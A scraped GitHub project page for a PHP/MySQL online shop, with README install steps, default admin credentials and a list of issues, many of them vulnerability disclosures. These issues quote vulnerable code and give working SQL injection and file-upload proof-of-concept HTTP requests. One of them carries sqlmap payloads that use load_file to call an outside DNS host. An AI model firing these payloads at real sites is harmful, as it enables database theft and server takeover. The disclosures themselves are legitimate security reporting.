Demo site

License: Apache License 2.0

PHP 82.10% Hack 17.90%

php online-shop dbms-project projects computer-science php-project mysql admin-pages xampp dbms database adduser admin admin-dashboard web-technologies

online-shopping-system-advanced's Introduction

Updated project with extra Features like WISHLIST, List Orders, add Reviews, updated routing, resolved search bug is available for Premium

Things I code with

Projects We develop

Vue JS
Nuxt JS
Python
Django
PHP and MYSQL
Angular JS
React JS
AI/ML

Projects with installation support and code explaination for Premium contact gmail: [email protected] or visit :Projects Wall

Installation

Install XAMPP or WAMPP.
Open XAMPP Control panal and start [apache] and [mysql] .
Download project from github(https://github.com/PuneethReddyHC/online-shopping-system-with-advanced-admin-page.git)
OR follow gitbash commands

i>cd C:\xampp\htdocs\

ii>git clone https://github.com/PuneethReddyHC/online-shopping-system-with-advanced-admin-page.git
extract files in C:\xampp\htdocs.
open link localhost/phpmyadmin
click on new at side navbar.
give a database name as (onlineshop) hit on create button.
after creating database name click on import.
browse the file in directory[online-shopping-system-with-advanced-admin-page/database/onlineshop.sql].
after importing successfully.
open any browser and type http://localhost/online-shopping-system-with-advanced-admin-page-master.
first register and then login
admin login details Email=[email protected] or username = admin and Password=123456789.

If you like my project

Bye me Cup of coffee

visit my other repository with different admin pages with below link

https://github.com/PuneethReddyHC/online-shopping-system-advanced

https://github.com/PuneethReddyHC/event-management

If you like my project hit a star button

Screenshots

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

online-shopping-system-advanced's People

Contributors

Stargazers

Watchers

Forkers

legendsneverdiex6 hashancb zaprog rubelbiswascs almasisystems parul3576 mmadani tiwa007 akanksha180898 liferocks007 shiva-rnm hieuthanhpy treelog123 mutaharnouman96 prasanth22 walkawave sreekanthadari rjmj harshalshende al-mamunprovath17 jfranciscogb vaishali197 hailubeshada govindarajit taskmaster001 abhishek-globant sudipa22 dr-montasir maheshbabugorava karanbalani josephjlee forks-rep umairvarin ranjithgopal jervygu owaresabd balusreekanth reddysairam jehadtw97 amanse sulaimansiddiqi rajesh-ji florin5656 danni1212 cpojha rupesh8601 itsmeashishkumar gaurav07462 vickazy ronnakit29 victorichmedia gazellebrouk amenulhaq akinolawale soni0602 talkdkg ricardorohde ndayikeza petokoth ilkerceng sameerhussain18 drtridz annak1n rajeshkundurthi beenji anuj8384 alpah7 sagarjeu arsyadshidiq zubaiir kowunnako sathish97625 kamlismit dvs5689 hassaanraheem11 barakajoash rubelmiah99999 legendoscar kassablanka deepanshi16 hargi12 paramesh514 abeltomas73 mr-vijaychauhan zeeshan1027 akilawijesinghe abubakkar13 rodrigo143 sbosh1993 majdi-web abdulnishad12 nithika07 abhishekdam nandwi saimkhan346 yash-code-crypto maslakonetop vaibhavdevops75 mitulshah1 muskanmahajan37

online-shopping-system-advanced's Issues

How can I run this project?

I tried with readme instruction.

But , it not works . it comes like this

Object not found! The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. If you think this is a server error, please contact the webmaster. Error 404 localhost Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8

Give a solution for this .

A lot of Security Issues

I see a lot of security issues in your code. Its always good to write secure code.

Found a vulnerability

Vulnerability file address

admin/edit_user.php from line 4,The $user_id parameter is controllable, the parameter user_id can be passed through post, and the $user_id is not protected from sql injection, resulting in sql injection

$user_id=$_REQUEST['user_id'];

$result=mysqli_query($con,"select user_id, email, password from user_info where user_id='$user_id'")or die ("query 1 incorrect.......");

list($user_id,$user_name,$user_password)=mysqli_fetch_array($result);

POC

GET /admin/edit_user.php?user_id=1%27+union+select+1,user(),3%23 HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=iq8aj0cq3p4rf0s9m3864gtkr0
Upgrade-Insecure-Requests: 1

Attack results pictures

Found a vulnerability

Vulnerability file address

admin/orders.php from line 5,The $order_id parameter is controllable, the parameter order_id can be passed through get, and the $order_id is not protected from sql injection, resulting in sql injection

if(isset($_GET['action']) && $_GET['action']!="" && $_GET['action']=='delete')
{
$order_id=$_GET['order_id'];

/*this is delet query*/
mysqli_query($con,"delete from orders where order_id='$order_id'")or die("delete query is incorrect...");
}

POC

GET /admin/orders.php?action=delete&order_id=bbbb' AND 3916=BENCHMARK(5000000,MD5(0x7748556f))-- hdtf HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

Could not open the deployment

Unable to open the deployment.

Found a vulnerability

Vulnerability file address

product.php from line 60,The $product_id parameter is controllable, the parameter p can be passed through get, and the $product_id is not protected from sql injection, resulting in sql injection

......
......
......
<?php 
include 'db.php';
$product_id = $_GET['p'];

$sql = " SELECT * FROM products ";
$sql = " SELECT * FROM products WHERE product_id = $product_id";
if (!$con) {
  die("Connection failed: " . mysqli_connect_error());
}
$result = mysqli_query($con, $sql);
......
......
......

POC

GET /product.php?p=1 AND (SELECT 9365 FROM (SELECT(SLEEP(5)))RcRq) HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

Shopping

SRS document is not available

cart not working

am not able to find any logic for cart in your project

Can not access to My Profile Page

Dear Mr.Puneeth, @PuneethReddyHC ,

I tried to access to My Profile page to change my data (email) but I can not access to it , I liked your project and I sent to you an email to give me a permission to develop this part (My Profile page) in the project for improve it.

I'm waiting your replay.

Regards,
Doaa

Found a vulnerability

Vulnerability file address

admin/cosmetics_list.php from line 5,The $product_id parameter is controllable, the parameter product_id can be passed through get, and the $product_id is not protected from sql injection, resulting in sql injection

if(isset($_GET['action']) && $_GET['action']!="" && $_GET['action']=='delete')
{
$product_id=$_GET['product_id'];
///////picture delete/////////
$result=mysqli_query($con,"select product_image from products where product_id='$product_id")
or die("query is incorrect...");

POC

GET /admin/cosmetics_list.php?action=delete&product_id=cccc' AND (SELECT 7939 FROM (SELECT(SLEEP(5)))sdWF)-- xcNg HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

Found a vulnerability

Vulnerability file address

register.php from line 4,The $address2 parameter is controllable, the parameter address2 can be passed through post, and the $address2 is not protected from sql injection, resulting in sql injection

<?php
session_start();
include "db.php";
if (isset($_POST["f_name"])) {

  $f_name = $_POST["f_name"];
  $l_name = $_POST["l_name"];
  $email = $_POST['email'];
  $password = $_POST['password'];
  $repassword = $_POST['repassword'];
  $mobile = $_POST['mobile'];
  $address1 = $_POST['address1'];
  $address2 = $_POST['address2'];
  $name = "/^[a-zA-Z ]+$/";
  $emailValidation = "/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9]+(\.[a-z]{2,4})$/";
  $number = "/^[0-9]+$/";
......
......
......
$sql = "INSERT INTO `user_info` 
		(`user_id`, `first_name`, `last_name`, `email`, 
		`password`, `mobile`, `address1`, `address2`) 
		VALUES (NULL, '$f_name', '$l_name', '$email', 
		'$password', '$mobile', '$address1', '$address2')";
		$run_query = mysqli_query($con,$sql);

POC

success

POST /register.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 166
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25

f_name=a&l_name=a&email=2%40qq.com&password=123456789&repassword=123456789&mobile=1111111111&address1=123&address2=7' and if(ascii(mid(user(),1,1))=114,sleep(2),0));#

failed

POST /register.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 166
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25

f_name=a&l_name=a&email=3%40qq.com&password=123456789&repassword=123456789&mobile=1111111111&address1=123&address2=7' and if(ascii(mid(user(),1,1))=115,sleep(2),0));#

Attack results pictures

success

failed

Register

Registered accnt is not present in database anf unable to login broo

SQL Injection1

Vulnerability file address

$user_id=$_REQUEST['user_id'];

$result=mysqli_query($con,"select user_id, email, password from user_info where user_id='$user_id'")or die ("query 1 incorrect.......");

list($user_id,$user_name,$user_password)=mysqli_fetch_array($result);

POC

GET /admin/edit_user.php?user_id=1%27+union+select+1,user(),3%23 HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=iq8aj0cq3p4rf0s9m3864gtkr0
Upgrade-Insecure-Requests: 1

Attack results pictures

Found a vulnerability

Vulnerability file address

admin/index.php There is no authentication check on the cookie or session or header header, resulting in unauthorized access

<?php

session_start();
?>
..........
..........
..........
<?php  //success message
if(isset($_POST['success'])) {
$success = $_POST["success"];
echo "<h1 style='color:#0C0'>Your Product was added successfully &nbsp;&nbsp;  <span class='glyphicon glyphicon-ok'></h1></span>";
}
?></h3>
	</div>
</div></div></div>
<?php include("include/js.php"); ?>
</body>
</html>

POC

GET /admin/ HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

Password Encryption and SQL Injection Vulnerability in config.php

Password Encryption:
The code uses the outdated md5 function for password encryption, which is considered weak. It's recommended to use password_hash and password_verify for more secure password handling.
SQL Injection:
The code is susceptible to SQL injection attacks as it directly interpolates user inputs into SQL queries. Using prepared statements helps prevent SQL injection by separating data from the query.

Fix Details:

Password Encryption:

Issue: Using md5 for password hashing is insecure.

Fix:

// Change this line
$password = md5($password_1);

// To
$hashed_password = password_hash($password_1, PASSWORD_DEFAULT);

SQL Injection:

Issue: Lack of prepared statements in the user check query.

Fix:

// Change this block
$user_check_query = "SELECT * FROM register WHERE Name='$username' OR email='$email' LIMIT 1";
$result = mysqli_query($db, $user_check_query);

// To
$user_check_query = $db->prepare("SELECT * FROM register WHERE Name=? OR email=? LIMIT 1");
$user_check_query->bind_param('ss', $username, $email);
$user_check_query->execute();
$result = $user_check_query->get_result();

Additional Recommendations:

Error Handling:

Add error handling for database queries to provide meaningful error messages.

$result = $user_check_query->get_result();
if (!$result) {
    die('Error executing query: ' . $user_check_query->error);
}

Session Start Check:
- Check if the session is already started before calling session_start() to avoid potential issues.
```
if (session_status() == PHP_SESSION_NONE) {
    session_start();
}
```

Logging Out:

If you have a logout functionality, include a secure way to destroy the session.

if (isset($_GET['logout'])) {
    session_destroy();
    unset($_SESSION['Name']);
    header("location: index.php");
}

Access denied; you need (at least one of) the SUPER privilege(s) for this operation

-ERROR 1227 (42000) at line 29: Access denied; you need (at least one of) the SUPER privilege(s) for this operation

-program 'mysql' finished with non-zero exit code: 1

Movers and Packers in Abu Dhabi 0566687687

MOVING COMPANY IN DUBAI
We Do More Than A NR Mover And Packers Service In UAE- We Check For Glitches That Need Attention To Keep You Safe And Save Your Money.NR Movers Is Your Custom Long Distance Mover. We Professionalize In Long

Lots of SQL Injection Vulnerabilities

There are lots of SQL injection issues throughout the system. I would like to fix it. It'll take a whole reconstruction of all the queries using prepared statements. Acknowledge if its fine to fix

Delete menu at second menu is not working

Security vulnerability responsible disclosure

Hello,

CERT PL found a security vulnerability in this repository. How can we report this privately? We don't see any security policy describing how such vulnerabilities should be reported.

File upload vulnerability1

Vulnerability file address

admin/add_product.php from line 18,It only restricts the type of the file, and does not restrict the file suffix, and the file type can be bypassed only by modifying the http Content-Type field.

//picture coding
$picture_name=$_FILES['picture']['name'];
$picture_type=$_FILES['picture']['type'];
$picture_tmp_name=$_FILES['picture']['tmp_name'];
$picture_size=$_FILES['picture']['size'];

if($picture_type=="image/jpeg" || $picture_type=="image/jpg" || $picture_type=="image/png" || $picture_type=="image/gif")
{
	if($picture_size<=50000000)
	
		$pic_name=time()."_".$picture_name;
		move_uploaded_file($picture_tmp_name,"../product_images/".$pic_name);

POC

POST /admin/add_product.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------254658479040777430842599586609
Content-Length: 1040
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/admin/add_product.php
Cookie: PHPSESSID=9g99r79stt08ctlc0nn1s1jci4
Upgrade-Insecure-Requests: 1

-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="product_name"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="details"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="picture"; filename="1.php"
Content-Type: image/gif

GIF89a<?php phpinfo(); ?>

-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="price"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="product_type"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="brand"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="tags"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="submit"


-----------------------------254658479040777430842599586609--

Attack results pictures

The uploaded php file is prefixed with a 10-digit timestamp, so it needs to be blasted

Cross-site Scripting (XSS) - Reflected

online-shopping-system-advanced/register.php

Line 125 in 5967231

echo "<script> location.href='store.php'; </script>";

Found a vulnerability

Vulnerability file address

admin/manage_users.php from line 4,The $user_id parameter is controllable, the parameter user_id can be passed through post, and the $user_id is not protected from sql injection, resulting in sql injection

if(isset($_GET['action']) && $_GET['action']!="" && $_GET['action']=='delete')
{
$user_id=$_GET['user_id'];
/*this is delet quer*/
mysqli_query($con,"delete from user_info where user_id='$user_id'")or die("query is incorrect...");
}

POC

GET /admin/manage_users.php?user_id=' OR (SELECT 7316 FROM (SELECT(SLEEP(5)))lqxS)-- nZPW&action=delete HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://www.onsp.net/admin/manage_users.php?action=1&user_id=5
Cookie: PHPSESSID=iq8aj0cq3p4rf0s9m3864gtkr0
Upgrade-Insecure-Requests: 1

Attack results pictures

Movers and Packers in Abu Dhabi +971 56 638 3705

Lucky Movers & Packers
lucky movers and packers is an outstanding relocation services provider in UAE. we have built a name over the years with our wealth of experience and a network of global partners. we are committed to offering our clients the best relocation experience.

Notice: Undefined index: c_price in /opt/lampp/htdocs/online- courses/admin/addproduct.php on line 11 Warning: move_uploaded_file(../product_images/1572667815_html.png): failed to open stream: Permission denied in /opt/lampp/htdocs/online- courses/admin/addproduct.php on line 27 Warning: move_uploaded_file(): Unable to move '/opt/lampp/temp/phprf2Zzd' to '../product_images/1572667815_html.png' in /opt/lampp/htdocs/online- courses/admin/addproduct.php on line 27 query incorrect

Multiple SQLi

For termination
STATUS: CRITICAL!
Dear pseudo developer, please terminate this thing, if you know how, or fix it if you understand what actually is happening.
BR @nu11secur1ty

Parameter: cid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' OR NOT 4084=4084 AND 'icSi'='icSi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#

Parameter: password (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]&password=e2H!l7r!I2' AND (SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on

Parameter: p (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
    Payload: p=MAKE_SET(3691=3691,8073)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: p=(SELECT 4211 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(4211=4211,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)
    Payload: p=60'+(select load_file('\\\\9x7re23uz38xdqq4hj8u4e8ba2gv4vzjqmed13ps.tupmangal.net\\eyn'))+' (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)

All:

[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]
[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]
[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php [password parameter]]
[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]
[1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]
[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php [email parameter]]
[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name parameter]]

online-shopping-system-v2 error

thanks for the free online shop!!
but unfortunately it is not error-free and finished. can you help me with this

Notice: Trying to access array offset on value of type null inlogin.php on line 17
login.zip

-> $_SESSION["uid"] = $row["user_id"];
-> $_SESSION["name"] = $row["first_name"];
$ip_add = getenv("REMOTE_ADDR");

+++thanks from italy

Trying to get in touch regarding a security issue

Hey there!

I'd like to report a security issue but cannot find contact instructions on your repository.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

orders

unable to view the orders in the admin panel

web page not working

its showing this

Warning: mysqli_connect(): (HY000/1044): Access denied for user ''@'localhost' to database 'ecommerece' in C:\xampp\htdocs\online-shopping-system-advanced-master\db.php on line 9
Connection failed: Access denied for user ''@'localhost' to database 'ecommerece'

category total count is wrong

In my case I just left 3 categories and when you see the categories, the first one has all the items and the others none

original and wrong query in file action.php

#sql = "SELECT COUNT(*) AS count_items FROM products WHERE product_cat=$i";

this is the correcto query

$sql = "SELECT COUNT(*) AS count_items FROM products WHERE product_cat=$cid";

admin pannel not open pls help me

i write [email protected] but not open it give me error

Hello developers, can you add a version number?

Pointless transaction in onlineshop.sql

Just saw a (minor) issue in the database setup file (database/onlineshop.sql):

START TRANSACTION;
[…]
CREATE DEFINER=`root`@`localhost` PROCEDURE
[…]
CREATE TABLE
[…]
COMMIT;

Any DDL statement causes an implicit commit, so you should either completely remove the transaction or wrap only the DML statements inside.
cf. https://dev.mysql.com/doc/refman/8.0/en/implicit-commit.html

Password not encrypted

The password which was a person use when registering is not encrypted before being stored in the database. This makes the accounts not safe from hackers.

Found a vulnerability

Vulnerability file address

admin/clothes_list.php from line 5,The $product_id parameter is controllable, the parameter product_id can be passed through get, and the $product_id is not protected from sql injection, resulting in sql injection

if(isset($_GET['action']) && $_GET['action']!="" && $_GET['action']=='delete')
{
$product_id=$_GET['product_id'];
///////picture delete/////////
$result=mysqli_query($con,"select product_image from products where product_id='$product_id'")
or die("query is incorrect...");

POC

GET /admin/clothes_list.php?action=delete&product_id=aaaaa' AND (SELECT 1853 FROM (SELECT(SLEEP(5)))zDGS)-- ZvnN HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

Found a vulnerability

Vulnerability file address

admin/add_product.php from line 18,It only restricts the type of the file, and does not restrict the file suffix, and the file type can be bypassed only by modifying the http Content-Type field.

//picture coding
$picture_name=$_FILES['picture']['name'];
$picture_type=$_FILES['picture']['type'];
$picture_tmp_name=$_FILES['picture']['tmp_name'];
$picture_size=$_FILES['picture']['size'];

if($picture_type=="image/jpeg" || $picture_type=="image/jpg" || $picture_type=="image/png" || $picture_type=="image/gif")
{
	if($picture_size<=50000000)
	
		$pic_name=time()."_".$picture_name;
		move_uploaded_file($picture_tmp_name,"../product_images/".$pic_name);

POC

POST /admin/add_product.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------254658479040777430842599586609
Content-Length: 1040
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/admin/add_product.php
Cookie: PHPSESSID=9g99r79stt08ctlc0nn1s1jci4
Upgrade-Insecure-Requests: 1

-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="product_name"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="details"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="picture"; filename="1.php"
Content-Type: image/gif

GIF89a<?php phpinfo(); ?>

-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="price"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="product_type"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="brand"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="tags"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="submit"


-----------------------------254658479040777430842599586609--

Attack results pictures

The uploaded php file is prefixed with a 10-digit timestamp, so it needs to be blasted

wasn't able to open the site on browser as it showed not found on server

Found a vulnerability

Vulnerability file address

admin/add_user.php from line 7,The $first_name parameter is controllable, the parameter first_name can be passed through post, and the $first_name is not protected from sql injection, resulting in sql injection

if(isset($_POST['btn_save']))
{
$first_name=$_POST['first_name'];
$last_name=$_POST['last_name'];
$email=$_POST['email'];
$user_password=$_POST['user_password'];
$mobile=$_POST['mobile'];
$address1=$_POST['address1'];
$address2=$_POST['address2'];

mysqli_query($con,"insert into user_info(first_name, last_name,email,password,mobile,address1,address2) values ('$first_name','$last_name','$email','$user_password','$mobile','$address1','$address2')") 
			or die ("Query 1 is inncorrect........");
header("location: manage_users.php"); 
mysqli_close($con);

POC

POST /admin/add_user.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/admin/add_user.php
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

first_name=1'+(SELECT 0x6e504162 WHERE 1952=1952 AND (SELECT 6458 FROM (SELECT(SLEEP(5)))rFne))+'&last_name=1&email=1&user_password=1&mobile=1&address1=1&address2=1&btn_save=

Attack results pictures

SQL Injection in Login.php

I noticed the password input is not sanitized in login.php. This can lead to an attacker performing an SQL Injection attack.

Trying to access array offset on value of type null in C:\xampp\htdocs\online-shopping-system-advanced-master\header.php on line 140

Requested url not found

Actually, the given instructions are for windows and I am a linux user. I imported the database in phpmyadmin and when I opened the link given in instruction 10, it said 404 not found. So can somebody please help me with it?
Thanks

Found a UI issue on when we hover on Cart cursor not changed to pointer

Found a UI issue on when we hover on Cart cursor not changed to pointer.
I have fixed this and pushed please merge my pull request.
looking forward to work on this 😉
thanks

Warning: mysqli_connect(): (HY000/1045): Access denied for user 'PuneethReddy'@'localhost'

Warning: mysqli_connect(): (HY000/1045): Access denied for user 'PuneethReddy'@'localhost' (using password: NO) in C:\xampp\htdocs\online-shopping-system-advanced-master\db.php on line 9
Connection failed: Access denied for user 'PuneethReddy'@'localhost' (using password: NO)

action.php

i can not understand the code on line 447,448 and 449.
subscribe does not work pls help me

puneethreddyhc / online-shopping-system-advanced Goto Github PK

online-shopping-system-advanced's Introduction

